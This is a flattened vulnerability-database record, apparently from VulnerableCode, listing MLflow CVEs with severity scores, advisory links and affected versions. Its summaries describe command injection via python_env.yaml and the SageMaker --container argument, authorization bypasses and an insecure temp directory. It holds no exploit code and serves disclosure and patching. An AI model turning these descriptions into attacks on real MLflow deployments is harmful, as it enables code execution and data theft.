scoring_elements
url https://github.com/mlflow/mlflow
2
reference_url https://github.com/mlflow/mlflow/commit/5f98ff98659dddb188591ecf6b10a4e276a0dba7
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/5f98ff98659dddb188591ecf6b10a4e276a0dba7
3
reference_url https://github.com/mlflow/mlflow/commit/e7dc0574fa3459e0003cfeb68d4e4a625491f03d
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/e7dc0574fa3459e0003cfeb68d4e4a625491f03d
4
reference_url https://www.zerodayinitiative.com/advisories/ZDI-25-931
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.zerodayinitiative.com/advisories/ZDI-25-931
5
reference_url https://github.com/B-Step62/mlflow/commit/2e02bc7bb70df243e6eb792689d9b8eba0013161
reference_id 2e02bc7bb70df243e6eb792689d9b8eba0013161
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-31T03:55:31Z/
url https://github.com/B-Step62/mlflow/commit/2e02bc7bb70df243e6eb792689d9b8eba0013161
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-11201
reference_id CVE-2025-11201
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-11201
7
reference_url https://github.com/advisories/GHSA-5cvj-7rg6-jggj
reference_id GHSA-5cvj-7rg6-jggj
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5cvj-7rg6-jggj
8
reference_url https://www.zerodayinitiative.com/advisories/ZDI-25-931/
reference_id ZDI-25-931
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-31T03:55:31Z/
url https://www.zerodayinitiative.com/advisories/ZDI-25-931/
fixed_packages
0
url pkg:pypi/mlflow@2.22.4
purl pkg:pypi/mlflow@2.22.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-4jya-uh8s-4ycv
4
vulnerability VCID-7ykf-b93e-w7am
5
vulnerability VCID-96az-gdtg-aka8
6
vulnerability VCID-97xj-trtn-g7ah
7
vulnerability VCID-9mak-nkua-3uhr
8
vulnerability VCID-axte-ftrh-4bb7
9
vulnerability VCID-fxtg-yezw-hfhr
10
vulnerability VCID-kqsy-qu8j-8ugj
11
vulnerability VCID-scm3-63j1-tkf2
12
vulnerability VCID-tnps-h89q-a7hj
13
vulnerability VCID-w5et-zcp1-zfdb
14
vulnerability VCID-wphf-gk61-8ube
15
vulnerability VCID-xdur-8vs8-jfcy
16
vulnerability VCID-xjux-g847-hyb8
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@2.22.4
1
url pkg:pypi/mlflow@3.0.0
purl pkg:pypi/mlflow@3.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-4jya-uh8s-4ycv
4
vulnerability VCID-7ykf-b93e-w7am
5
vulnerability VCID-96az-gdtg-aka8
6
vulnerability VCID-97xj-trtn-g7ah
7
vulnerability VCID-9mak-nkua-3uhr
8
vulnerability VCID-axte-ftrh-4bb7
9
vulnerability VCID-fxtg-yezw-hfhr
10
vulnerability VCID-kqsy-qu8j-8ugj
11
vulnerability VCID-scm3-63j1-tkf2
12
vulnerability VCID-tnps-h89q-a7hj
13
vulnerability VCID-w5et-zcp1-zfdb
14
vulnerability VCID-wphf-gk61-8ube
15
vulnerability VCID-xdur-8vs8-jfcy
16
vulnerability VCID-xjux-g847-hyb8
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.0.0
aliases CVE-2025-11201, GHSA-5cvj-7rg6-jggj
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k79p-ju8g-9bhe
11
url VCID-kqsy-qu8j-8ugj
vulnerability_id VCID-kqsy-qu8j-8ugj
summary 
MLflow is vulnerable to an authorization bypass affecting the AJAX endpoint used to download saved model artifacts. Due to missing access‑control validation, a user without permissions to a given experiment can directly query this endpoint and retrieve model artifacts they are not authorized to access.

 
This issue affects MLflow version through 3.10.1
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33866.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33866.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33866
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.0138
published_at 2026-06-14T12:55:00Z
1
value 9e-05
scoring_system epss
scoring_elements 0.01029
published_at 2026-06-12T12:55:00Z
2
value 9e-05
scoring_system epss
scoring_elements 0.01032
published_at 2026-06-11T12:55:00Z
3
value 9e-05
scoring_system epss
scoring_elements 0.01036
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33866
2
reference_url https://cert.pl/en/posts/2026/04/CVE-2026-33865
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://cert.pl/en/posts/2026/04/CVE-2026-33865
3
reference_url https://github.com/advisories/GHSA-46r5-x6jq-v8g6
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-46r5-x6jq-v8g6
4
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
5
reference_url https://github.com/mlflow/mlflow/commit/005b959cacda05d1423356cfcbd9ebeda8ff96a7
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/005b959cacda05d1423356cfcbd9ebeda8ff96a7
6
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2026-94.yaml
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2026-94.yaml
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33866
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33866
8
reference_url https://github.com/mlflow/mlflow/pull/21708
reference_id 21708
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:12:33Z/
url https://github.com/mlflow/mlflow/pull/21708
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2455900
reference_id 2455900
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2455900
10
reference_url https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors
reference_id attacking-mlflow-how-ml-artifacts-become-attack-vectors
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:12:33Z/
url https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors
11
reference_url https://cert.pl/en/posts/2026/04/CVE-2026-33865/
reference_id CVE-2026-33865
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:12:33Z/
url https://cert.pl/en/posts/2026/04/CVE-2026-33865/
fixed_packages
0
url pkg:pypi/mlflow@3.11.0rc0
purl pkg:pypi/mlflow@3.11.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-fxtg-yezw-hfhr
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.11.0rc0
aliases BIT-mlflow-2026-33866, CVE-2026-33866, GHSA-46r5-x6jq-v8g6, PYSEC-2026-94
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kqsy-qu8j-8ugj
12
url VCID-scm3-63j1-tkf2
vulnerability_id VCID-scm3-63j1-tkf2
summary A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_install_model_dependencies_to_env()` function. When deploying a model with `env_manager=LOCAL`, MLflow reads dependency specifications from the model artifact's `python_env.yaml` file and directly interpolates them into a shell command without sanitization. This allows an attacker to supply a malicious model artifact and achieve arbitrary command execution on systems that deploy the model. The vulnerability affects versions 3.8.0 and is fixed in version 3.8.2.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15379.json
reference_id
reference_type
scores
0
value 9.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15379.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-15379
reference_id
reference_type
scores
0
value 0.00281
scoring_system epss
scoring_elements 0.51978
published_at 2026-06-14T12:55:00Z
1
value 0.00281
scoring_system epss
scoring_elements 0.51994
published_at 2026-06-13T12:55:00Z
2
value 0.00281
scoring_system epss
scoring_elements 0.51851
published_at 2026-06-11T12:55:00Z
3
value 0.00281
scoring_system epss
scoring_elements 0.51981
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-15379
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://github.com/mlflow/mlflow/commit/a22ce7157f646bdce4c95106fc38ccc9ca289205
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/a22ce7157f646bdce4c95106fc38ccc9ca289205
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-15379
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-15379
5
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2452949
reference_id 2452949
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2452949
6
reference_url https://github.com/mlflow/mlflow/commit/361b6f620adf98385c6721e384fb5ef9a30bb05e
reference_id 361b6f620adf98385c6721e384fb5ef9a30bb05e
reference_type
scores
0
value 10
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-03-31T03:55:37Z/
url https://github.com/mlflow/mlflow/commit/361b6f620adf98385c6721e384fb5ef9a30bb05e
7
reference_url https://huntr.com/bounties/dc9c1c20-7879-4050-87df-4d095fe5ca75
reference_id dc9c1c20-7879-4050-87df-4d095fe5ca75
reference_type
scores
0
value 10
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-03-31T03:55:37Z/
url https://huntr.com/bounties/dc9c1c20-7879-4050-87df-4d095fe5ca75
8
reference_url https://github.com/advisories/GHSA-r23q-823p-vmf7
reference_id GHSA-r23q-823p-vmf7
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-r23q-823p-vmf7
fixed_packages
0
url pkg:pypi/mlflow@3.8.1
purl pkg:pypi/mlflow@3.8.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-9mak-nkua-3uhr
5
vulnerability VCID-axte-ftrh-4bb7
6
vulnerability VCID-fxtg-yezw-hfhr
7
vulnerability VCID-kqsy-qu8j-8ugj
8
vulnerability VCID-scm3-63j1-tkf2
9
vulnerability VCID-wphf-gk61-8ube
10
vulnerability VCID-xdur-8vs8-jfcy
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.8.1
1
url pkg:pypi/mlflow@3.9.0rc0
purl pkg:pypi/mlflow@3.9.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-axte-ftrh-4bb7
5
vulnerability VCID-fxtg-yezw-hfhr
6
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.9.0rc0
aliases CVE-2025-15379, GHSA-r23q-823p-vmf7
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-scm3-63j1-tkf2
13
url VCID-tnps-h89q-a7hj
vulnerability_id VCID-tnps-h89q-a7hj
summary A command injection vulnerability exists in mlflow/mlflow versions before v3.7.0, specifically in the `mlflow/sagemaker/__init__.py` file at lines 161-167. The vulnerability arises from the direct interpolation of user-supplied container image names into shell commands without proper sanitization, which are then executed using `os.system()`. This allows attackers to execute arbitrary commands by supplying malicious input through the `--container` parameter of the CLI. The issue affects environments where MLflow is used, including development setups, CI/CD pipelines, and cloud deployments.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-14287.json
reference_id
reference_type
scores
0
value 7.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-14287.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-14287
reference_id
reference_type
scores
0
value 0.0034
scoring_system epss
scoring_elements 0.5719
published_at 2026-06-12T12:55:00Z
1
value 0.0034
scoring_system epss
scoring_elements 0.57198
published_at 2026-06-14T12:55:00Z
2
value 0.0034
scoring_system epss
scoring_elements 0.57072
published_at 2026-06-11T12:55:00Z
3
value 0.0034
scoring_system epss
scoring_elements 0.57204
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-14287
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://github.com/mlflow/mlflow/commit/8b8792a7034fb33a14b0b31cabcaa9b912d3485f
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/8b8792a7034fb33a14b0b31cabcaa9b912d3485f
4
reference_url https://github.com/mlflow/mlflow/pull/19277
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/pull/19277
5
reference_url https://github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-14287
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-14287
7
reference_url https://huntr.com/bounties/229cd526-41aa-4819-b6f0-e2d0371c89e3
reference_id 229cd526-41aa-4819-b6f0-e2d0371c89e3
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-17T03:55:37Z/
url https://huntr.com/bounties/229cd526-41aa-4819-b6f0-e2d0371c89e3
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2447690
reference_id 2447690
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2447690
9
reference_url https://github.com/advisories/GHSA-xch3-2f9x-wh9f
reference_id GHSA-xch3-2f9x-wh9f
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xch3-2f9x-wh9f
fixed_packages
0
url pkg:pypi/mlflow@3.8.0rc0
purl pkg:pypi/mlflow@3.8.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-9mak-nkua-3uhr
5
vulnerability VCID-axte-ftrh-4bb7
6
vulnerability VCID-fxtg-yezw-hfhr
7
vulnerability VCID-kqsy-qu8j-8ugj
8
vulnerability VCID-scm3-63j1-tkf2
9
vulnerability VCID-wphf-gk61-8ube
10
vulnerability VCID-xdur-8vs8-jfcy
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.8.0rc0
aliases CVE-2025-14287, GHSA-xch3-2f9x-wh9f
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tnps-h89q-a7hj
14
url VCID-w5et-zcp1-zfdb
vulnerability_id VCID-w5et-zcp1-zfdb
summary In mlflow version 2.20.3, the temporary directory used for creating Python virtual environments is assigned insecure world-writable permissions (0o777). This vulnerability allows an attacker with write access to the `/tmp` directory to exploit a race condition and overwrite `.py` files in the virtual environment, leading to arbitrary code execution. The issue is resolved in version 3.4.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-10279
reference_id
reference_type
scores
0
value 7e-05
scoring_system epss
scoring_elements 0.00684
published_at 2026-06-11T12:55:00Z
1
value 7e-05
scoring_system epss
scoring_elements 0.00688
published_at 2026-06-14T12:55:00Z
2
value 7e-05
scoring_system epss
scoring_elements 0.00682
published_at 2026-06-12T12:55:00Z
3
value 7e-05
scoring_system epss
scoring_elements 0.00683
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-10279
1
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
2
reference_url https://huntr.com/bounties/01d3b81e-13d1-43aa-b91a-443aec68bdc8
reference_id 01d3b81e-13d1-43aa-b91a-443aec68bdc8
reference_type
scores
0
value 7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-02T17:48:06Z/
url https://huntr.com/bounties/01d3b81e-13d1-43aa-b91a-443aec68bdc8
3
reference_url https://github.com/mlflow/mlflow/commit/1d7c8d4cf0a67d407499a8a4ffac387ea4f8194a
reference_id 1d7c8d4cf0a67d407499a8a4ffac387ea4f8194a
reference_type
scores
0
value 7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-02T17:48:06Z/
url https://github.com/mlflow/mlflow/commit/1d7c8d4cf0a67d407499a8a4ffac387ea4f8194a
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-10279
reference_id CVE-2025-10279
reference_type
scores
0
value 7.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-10279
5
reference_url https://github.com/advisories/GHSA-4x5p-f36r-mxxr
reference_id GHSA-4x5p-f36r-mxxr
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4x5p-f36r-mxxr
fixed_packages
0
url pkg:pypi/mlflow@3.4.0rc0
purl pkg:pypi/mlflow@3.4.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-4jya-uh8s-4ycv
4
vulnerability VCID-7ykf-b93e-w7am
5
vulnerability VCID-96az-gdtg-aka8
6
vulnerability VCID-9mak-nkua-3uhr
7
vulnerability VCID-axte-ftrh-4bb7
8
vulnerability VCID-fxtg-yezw-hfhr
9
vulnerability VCID-kqsy-qu8j-8ugj
10
vulnerability VCID-scm3-63j1-tkf2
11
vulnerability VCID-tnps-h89q-a7hj
12
vulnerability VCID-wphf-gk61-8ube
13
vulnerability VCID-xdur-8vs8-jfcy
14
vulnerability VCID-xjux-g847-hyb8
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.4.0rc0
aliases CVE-2025-10279, GHSA-4x5p-f36r-mxxr
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-w5et-zcp1-zfdb
15
url VCID-wphf-gk61-8ube
vulnerability_id VCID-wphf-gk61-8ube
summary In the latest version of mlflow/mlflow, when the `basic-auth` app is enabled, tracing and assessment endpoints are not protected by permission validators. This allows any authenticated user, including those with `NO_PERMISSIONS` on the experiment, to read trace information and create assessments for traces they should not have access to. This vulnerability impacts confidentiality by exposing trace metadata and integrity by allowing unauthorized creation of assessments. Deployments using `mlflow server --app-name=basic-auth` are affected.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15381.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15381.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-15381
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.022
published_at 2026-06-12T12:55:00Z
1
value 0.00013
scoring_system epss
scoring_elements 0.02208
published_at 2026-06-14T12:55:00Z
2
value 0.00013
scoring_system epss
scoring_elements 0.02195
published_at 2026-06-11T12:55:00Z
3
value 0.00013
scoring_system epss
scoring_elements 0.02199
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-15381
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://github.com/mlflow/mlflow/blob/b569ebc74c14af593c326143bee2df44a5d59edf/mlflow/server/auth/__init__.py#L752
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
